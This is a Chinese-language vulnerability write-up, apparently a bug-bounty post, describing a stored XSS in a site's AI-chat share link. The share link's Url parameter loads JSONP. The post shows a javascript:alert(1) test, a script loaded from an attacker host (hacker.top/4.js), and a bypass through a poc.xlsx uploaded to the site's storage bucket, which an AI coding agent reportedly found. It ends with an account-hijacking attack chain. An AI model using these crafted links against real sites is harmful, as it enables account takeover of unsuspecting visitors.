【漏洞分享】记一次ai对话功能点绕过到储存xss手法

声明

文中涉及到的技术和工具
仅供学习使用,禁止从事任何非法活动。
如因此造成的直接或间接损失,均由使用者自行承担责任

前言

第一次写文章,如果有错误
欢迎各位大佬指正,欢迎加微信交流

image.png
正文
起初是发现这个站点有一个ai对话功能,随便发送一句话,可以看见有一个分享功能

image.png
点击分享后会生成一个链接

点击分享后会生成一个链接
https://aaa.xxxxx.com/xxxx/ai.html?#/ai/Dialogue?Url=https%3A%2F%2Fxxx.oss-cn-hangzhou.aliyuncs.com%2Faifile%2F177998160342574b8de10-8bf8-4obd-8ec1-b01705fef844.js
访问后来到如下页面:

访问后来到如下页面:

image.png

看到了Url参数,我直接一个

Url=javascript:alert(1)

刷新页面,很遗憾什么事情都没发生
随后又尝试了文件读取,ssrf等手法后无果,页面都是空白

image.png
仔细观察原本url参数后,发现是一个js文件

Url=https%3A%2F%2Fxxx.oss-cn-hangzhou.aliyuncs.com%2Faifile%2F177998160342574b8de10-8bf8-4obd-8ec1-b01705fef844.js

我们尝试访问这个url查看文件内容

image.png
发现是一个这是一个典型的 JSONP

那么一目了然了,页面的内容就是通过这个jsonp加载数据渲染出来的

那么如果我在我服务器上也构造一个js文件呢?
并且把文本改成xssPayload,岂不是就直接造成xss了?
说干就干

image.png
然后构造好url后访问

https://aaa.xxxxx.com/xxxx/ai.html?#/ai/Dialogue?Url=https://hacker.top/4.js

image.png

什么?竟然还是空白?!

image.png
于是我就放弃了,去挖掘别的功能点了

在挖掘到一个上传功能点的时候,突然发现这个域名怎么这么眼熟呢

image.png
转念一想,woc这tm不就是刚刚那个url的储存桶域名吗?

我们一开始利用自己的服务器域名去伪造js文件,结果没内容

那我如果是储存桶域名的话,那么有可能就绕过了检测,话不多说直接尝试!

先上传一个js文件到这个储存桶,然后构造url如下访问:

https://aaa.xxxxx.com/xxxx/ai.html?#/ai/Dialogue?Url=https://xxx.oss-cn-hangzhou.aliyuncs.com/aifile/poc.js

激动人心的时刻终于来了

image.png
访问!

image.png

image.png
怎么还是空白啊...
受不鸟了,claude code启动!

image.png

打了一把激动人心的王者荣耀后回来看结果

image.png
原来需要利用储存桶域名和xlsx文件才能绕过检测
(ai牛福!!!)
然后手动构造好poc

https://aaa.xxxxx.com/xxxx/ai.html?#/ai/Dialogue?Url=https://xxx.oss-cn-hangzhou.aliyuncs.com/aifile/poc.xlsx

访问!

image.png
拿下拿下
攻击链:

上传恶意xlsx → 获取储存桶 URL → 构造share链接 → 受害者访问 → 恶意JS执行 → 成功劫持受害者账号

后面手动提升了一下危害
拿下高危^-^
最后

ai时代已来临
我们要做的是拥抱ai,把ai当成工具来使用,不应该过度的依赖ai和抵制ai。
希望各位师傅们,
都能找到自己和AI配合的节奏,早日吃上ai红利
希望这次分享可以帮助到大家,谢谢~
关注主包谢谢喵~ 麻烦师傅们点个赞!沃想升级!

image.png

温馨提示:本文内容仅用于合法授权的安全学习与研究交流,严禁用于未授权渗透测试、漏洞利用或任何违法行为。

涉及企业或平台的未公开漏洞信息,请遵循负责任披露原则,勿公开传播可直接复现的敏感细节。

如存在侵权、错误信息或不当内容,请联系站方处理,我们将及时核实并删除。邮箱:admin@baimaojianghu.com。